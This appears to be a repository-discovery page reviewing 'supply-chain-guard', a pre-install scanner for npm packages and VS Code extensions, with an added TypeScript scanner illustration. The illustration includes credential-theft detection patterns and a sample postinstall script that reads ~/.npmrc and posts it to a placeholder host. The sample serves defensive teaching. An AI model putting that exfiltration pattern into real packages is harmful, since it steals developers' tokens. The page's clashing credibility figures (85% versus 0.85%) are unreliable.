pc-style

Local supply-chain install gate for npm packages and VS Code extensions with Socket, Codex, and PI review support.

85% credibility
Found May 21, 2026 at 10 stars
TypeScript
AI Summary

Supply Chain Guard is a security tool that adds a review step before installing npm packages or VS Code extensions. It downloads the package first, examines its contents for suspicious behavior like hidden scripts that could steal credentials or run malicious code, and shows you a clear report before anything touches your project. You can optionally have an AI helper double-check the package. The tool integrates into your terminal so it automatically protects you whenever you try to install something, blocking risky packages and letting safe ones through.

How It Works

1. 🔍 You hear about a new package

A colleague mentions a useful npm package that could help with your project, but you've heard stories about malicious code hiding in packages.

2. 🛡️ You install Supply Chain Guard

You run a simple installation script that sets up the guard on your computer, ready to watch over your package installations.

3. Protection automatically activates

Once installed, the guard quietly watches over your terminal. Every time you try to install something, it steps in first.

4. 📦 You try to install a package

You run your normal command to add a package to your project, but the guard intercepts it before anything is downloaded.

5. 🔎 The guard examines the package

The tool downloads the package, peeks inside its files, checks what scripts it wants to run, and looks for anything suspicious like hidden network calls or attempts to access your credentials.

6. You see the results

Package looks safe

If the package passes the review, you get a clear green signal and can proceed with confidence.

🚫 Package has red flags

If something looks dangerous, the guard blocks the install and explains exactly what concerned it.

🎉 Your project stays safe

You can add packages with confidence, knowing you've checked them first. Every review is saved for later reference.


AI-Generated Review

What is supply-chain-guard?

Supply Chain Guard is a local install gate for npm packages and VS Code extensions that intercepts your package manager commands and inspects artifacts before they touch your project. Built in TypeScript and running on Bun, it downloads the tarball, extracts it, runs pattern analysis against lifecycle scripts, network calls, credential access attempts, and other suspicious behavior, then blocks high-risk installs automatically. It integrates with Socket.dev to pull in supply-chain intelligence scores, and can hand off reports to Codex or PI agents for deeper review before anything gets installed. Every scan produces JSON and Markdown reports under `.scguard/reports` for later auditing.
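To make the scan step concrete, here is an added TypeScript illustration of what a pre-install gate does once the tarball has been downloaded and extracted. It is not supply-chain-guard's own code; the names `scanPackage`, `renderMarkdown`, `SOURCE_RULES`, `SUSPICIOUS_PACKAGE` and `BENIGN_PACKAGE` are hypothetical, and both sample packages are constructed for this example. It checks the lifecycle hooks declared in `package.json`, runs a few heuristic patterns (network calls, credential file access, shell execution, obfuscation) over every JavaScript file, and turns the findings into a block/review/allow verdict plus a Markdown report of the kind a tool like this would write under `.scguard/reports`.

```typescript
// Added illustration, not supply-chain-guard's own code: the core of a
// pre-install gate that scans an already-extracted npm package tree.
// All names below (scanPackage, renderMarkdown, SUSPICIOUS_PACKAGE, ...) are
// hypothetical; the sample packages are constructed for this example.

type Severity = "high" | "medium";
type Finding = { rule: string; file: string; evidence: string; severity: Severity };
type ScanReport = {
  name: string;
  version: string;
  verdict: "block" | "review" | "allow";
  findings: Finding[];
};

// Hooks npm runs automatically during install; code reachable from them
// executes before the developer has looked at anything.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic source patterns. Each is a signal worth a human look, not proof
// of malice; a legitimate HTTP client will also trip "network-call".
const SOURCE_RULES: { rule: string; re: RegExp; severity: Severity }[] = [
  { rule: "network-call", re: /\brequire\(["'](https?|net|dns)["']\)|\bfetch\(/, severity: "medium" },
  { rule: "credential-access", re: /\.(npmrc|ssh\/|aws\/credentials|git-credentials)|process\.env\.(NPM_TOKEN|AWS_SECRET_ACCESS_KEY|GITHUB_TOKEN)/, severity: "high" },
  { rule: "shell-exec", re: /\b(child_process|execSync|spawnSync)\b/, severity: "medium" },
  { rule: "obfuscation", re: /\beval\(|new Function\(|(\\x[0-9a-f]{2}){4}/i, severity: "high" },
];

// files maps a path inside the extracted tarball to its text content.
function scanPackage(files: Record<string, string>): ScanReport {
  const manifest = JSON.parse(files["package.json"] ?? "{}");
  const scripts: Record<string, unknown> = manifest.scripts ?? {};
  const findings: Finding[] = [];

  // 1. Lifecycle scripts: anything here runs without user interaction.
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd === "string") {
      findings.push({ rule: "lifecycle-script", file: "package.json", evidence: `${hook}: ${cmd}`, severity: "medium" });
    }
  }

  // 2. Source patterns across every JavaScript file in the tarball.
  for (const [path, content] of Object.entries(files)) {
    if (!/\.[cm]?js$/.test(path)) continue;
    for (const r of SOURCE_RULES) {
      const m = r.re.exec(content);
      if (m) findings.push({ rule: r.rule, file: path, evidence: m[0], severity: r.severity });
    }
  }

  // 3. Decision. A high-severity pattern in a package that also declares a
  //    lifecycle hook is blocked outright (it can run unattended); anything
  //    else flagged goes to review; a clean tree is allowed.
  const hasHook = findings.some((f) => f.rule === "lifecycle-script");
  const hasHigh = findings.some((f) => f.severity === "high");
  const verdict: ScanReport["verdict"] = hasHook && hasHigh ? "block" : findings.length > 0 ? "review" : "allow";

  return { name: manifest.name ?? "unknown", version: manifest.version ?? "0.0.0", verdict, findings };
}

// Markdown rendering of the report (the JSON form is the report object itself).
function renderMarkdown(report: ScanReport): string {
  const lines = [`# ${report.name}@${report.version}: ${report.verdict.toUpperCase()}`, ""];
  for (const f of report.findings) {
    lines.push(`- [${f.severity}] ${f.rule} in ${f.file}: \`${f.evidence}\``);
  }
  return lines.join("\n");
}

// Constructed sample: a postinstall hook that reads ~/.npmrc and posts it out.
const SUSPICIOUS_PACKAGE: Record<string, string> = {
  "package.json": JSON.stringify({ name: "left-padz", version: "1.0.3", scripts: { postinstall: "node setup.js" } }),
  "setup.js": [
    'const fs = require("fs"), os = require("os");',
    'const tok = fs.readFileSync(os.homedir() + "/.npmrc", "utf8");',
    'require("https").request({ host: "collector.invalid", method: "POST" }).end(tok);',
  ].join("\n"),
};

// Constructed sample: a plain helper with no hooks and no suspicious calls.
const BENIGN_PACKAGE: Record<string, string> = {
  "package.json": JSON.stringify({ name: "tiny-trim", version: "2.1.0" }),
  "index.js": "module.exports = (s) => s.trim();",
};

console.log(renderMarkdown(scanPackage(SUSPICIOUS_PACKAGE)));
console.log(renderMarkdown(scanPackage(BENIGN_PACKAGE)));
```

The important design point is that the verdict weighs *where* a pattern can execute, not just that it exists: credential access in a file reachable from `postinstall` runs the moment `npm install` finishes, so it is blocked, while the same pattern in a package with no hooks only runs once the developer imports it, and is routed to review instead. A real gate would also feed the findings to an external score (the Socket.dev integration mentioned above) before deciding.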

Why is it gaining traction?

The npm ecosystem has a supply-chain problem, and this tool attacks it at the moment of highest risk: the install command. Unlike static analysis tools that run after the fact, this sits in front of `bun add`, `npm install`, and `code --install-extension`, staging artifacts and demanding approval before they execute any lifecycle code. The active incident mode is particularly clever—set an environment variable during a known attack campaign, and every single package operation requires you to type out explicit acceptance. The agent review integration means even non-security-focused teams can get a second opinion from an AI reviewer before installing marginal packages.

Who should use this?

Security-conscious developers who want defense-in-depth for their local environments. DevOps teams managing internal packages where you need audit trails. Anyone integrating third-party npm packages or VS Code extensions and wanting visibility into what those artifacts actually contain before running their install scripts. Not for teams that need enterprise-grade SBOM generation or policy enforcement—that's beyond the scope of what this does.

Verdict

At 10 stars and a 0.85% credibility score, this is an early-stage project that shows real thought behind it. The shell hook integration is seamless, the pattern detection is thorough, and the Socket/Codex/PI integration adds genuine intelligence layers. Test coverage is solid and the documentation is unusually complete for something this young. Try it in a non-production environment first—the active incident mode and staged install flow represent a workflow change that takes adjustment. If you're serious about supply-chain hygiene, this is worth watching.
